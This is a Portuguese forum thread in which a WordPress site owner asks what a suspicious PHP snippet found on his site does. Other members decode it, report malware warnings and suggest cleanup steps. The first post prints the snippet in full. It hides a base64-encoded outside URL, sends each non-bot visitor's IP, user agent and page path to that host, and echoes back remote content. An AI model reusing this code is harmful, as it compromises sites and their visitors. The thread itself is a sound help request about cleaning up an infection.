← Segurança

Encontri um código suspeito no meu site...podem me dizer o que faz?

Lida 6549 vezes

Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

Encontrei o seguite código no meu site

Código: [Seleccione]
<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>

A esta altura do campeonato já n sei dizer se este código foi la colocado por mim, para dar suporte a algum plugin ou se foi pra la injectado de alguma forma.

Só dei por ele porque agora estava a deformar o site....por isso algo se passou sem a minha intervenção 
Offline

zorreta 
Membro
Mensagens 850 Gostos 2
Feedback +10

Troféus totais: 32
Trófeus: (Ver todos)
Level 6 Tenth year Anniversary Nineth year Anniversary Signature Linux User Mobile User Windows User Super Combination Combination Topic Starter

Não vi bem o código, mas de qualquer forma o que está encriptado em base64 é este url: http://hotlogupdate.com/stat/stat.php
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 605
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

É algum script de estatisticas que instalas-te...
Offline

Roberto Francisco 
Membro
Mensagens 669 Gostos 1
Feedback +3

Troféus totais: 28
Trófeus: (Ver todos)
Apple User Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Pior ainda foi que o antivirus deu logo alarme quando entrei, não me parece fiável.
Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

Tenho andando a volta disto...isto ta cada vez pior...hj ja me dizia que o site era maligno

e no código fonte vejo la isto

*edit* tirei o código pk até aki acusava virus...apesar de ser só texto n executavel

claramente isto não pode ser bom.... a questão é que quando vou aos ficheiros mesmo...não vejo la isto...

suspeito que me tenha alterado a função wp_footer()

mas onde é que ela está??
Offline

GhostMaster 
Membro
Mensagens 1374 Gostos 0
Feedback +10

Troféus totais: 26
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1 1000 Posts

Até no tópico o meu antivírus bloqueia isto... para responder tive que desactivar o anti-virus por 1 minuto.lool
Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

aquele código deve ser muita fodido:P

reinstalei o wordpress e ja tirou aquilo....pelo menos até ver...aquilo devia ter estragado uns ficheiros do core do wordpress....

entrem no www.jogosbaratos.net a ver se vos aparece algum aviso sff
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 605
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

Offline

kurtmix 
Membro
Mensagens 1895 Gostos 605
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

A mim em firefox diz isto:

Código: [Seleccione]
"Suspeita de Sítio Maligno!

          O sítio web em  www.jogosbaratos.net foi denunciado como um sítio maligno e foi bloqueado de acordo com as suas preferências de segurança.
             
      Sítios malignos tentam instalar programas que roubam a sua informação privada, usam o seu computador para atacar outros ou estragam o seu sistema.Alguns sítios malignos distribuem intencionalmente software que provoca estragos, mas muitos foram comprometidos sem o conhecimento e/ou permissão dos seus donos."
Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

bom...tou minado... no firefox o código fonte que vejo é este:

Código: [Seleccione]
<div style='clear:both;'></div>
    </div>
  </div>
  <div id="bttmbar">
<a href="#logotipo">Top</a> |
<!--<a href="http://validator.w3.org/check?uri=referer">XHTML</a> |<a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a> |-->

Copyright &copy; 2009-2011 JogosBaratos. | <!--Sponsored link: <a href="http://www.jogosbaratos.net/poker-e-estrategia-vencedora/">Poker e Estratégia Vencedora</a> |--> All Rights Reserved
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-10333069-1");
pageTracker._trackPageview();
} catch(err) {}</script>

<script type="text/javascript">
FB_RequireFeatures(["XFBML"], function() {
  FB.init("c60c6499ff4c03a187d089579cc6297c", "http://www.jogosbaratos.net/?xd_receiver=1", {"permsToRequestOnConnect":"email"});
});
</script>
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201148.js" type="text/javascript"></script>

<script type="text/javascript">
st_go({blog:'14056927',v:'ext',post:'0'});
var load_cmc = function(){linktracker_init(14056927,0,2);};
if ( typeof addLoadEvent != 'undefined' ) addLoadEvent(load_cmc);
else load_cmc();
</script>

<div style="clear: both;"></div>  </body>
</html>

no index.php suponho que corresponda a isto:

Código: [Seleccione]
<div style='clear:both;'></div>
    </div>
  </div>
  <?php get_footer(); ?>
  </body>
</html>

e depois no footer tenho isto:

Código: [Seleccione]
<div id="bttmbar">

<a href="#logotipo">Top</a> |

<!--<a href="http://validator.w3.org/check?uri=referer">XHTML</a> |<a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a> |-->

Copyright &copy; 2009-2011 JogosBaratos. | <!--Sponsored link: <a href="http://www.jogosbaratos.net/poker-e-estrategia-vencedora/">Poker e Estratégia Vencedora</a> |--> All Rights Reserved

</div>



<script type="text/javascript">

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-10333069-1");

pageTracker._trackPageview();

} catch(err) {}</script>



<?php wp_footer(); ?>

<div style="clear: both;"></div>



onde pode estar aquele codigo do facebook?

Código: [Seleccione]
<script type="text/javascript">
FB_RequireFeatures(["XFBML"], function() {
  FB.init("c60c6499ff4c03a187d089579cc6297c", "http://www.jogosbaratos.net/?xd_receiver=1", {"permsToRequestOnConnect":"email"});
});

parece que desaparece.... :s
alguma dica?
Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

ok..editei o wp_footer e aquela parte desapareceu...se alguem tiver mais recomendações que me diga sff
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 605
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

Não sei se estás a apontar bem para o problema.

Lê isto: http://www.positioniseverything.net/easyclearing.html

Offline

ragnarock 
Membro
Mensagens 208 Gostos 1
Feedback +1

Troféus totais: 27
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2

humm? esse link tem a ver com que parte do código malicioso?
Offline

kurtmix 
Membro
Mensagens 1895 Gostos 605
Feedback +4

Troféus totais: 28
Trófeus: (Ver todos)
Tenth year Anniversary Nineth year Anniversary Eighth year Anniversary Seventh year Anniversary Search Level 5 Windows User Super Combination Combination Topic Starter

Descarrega a base de dados para um ficheiro sql no teu pc e depois abre com o notepad e procura por fragmentos do código malicioso. Podes ter sofrido uma sql injection e nesse caso o problema pode estar na base de dados.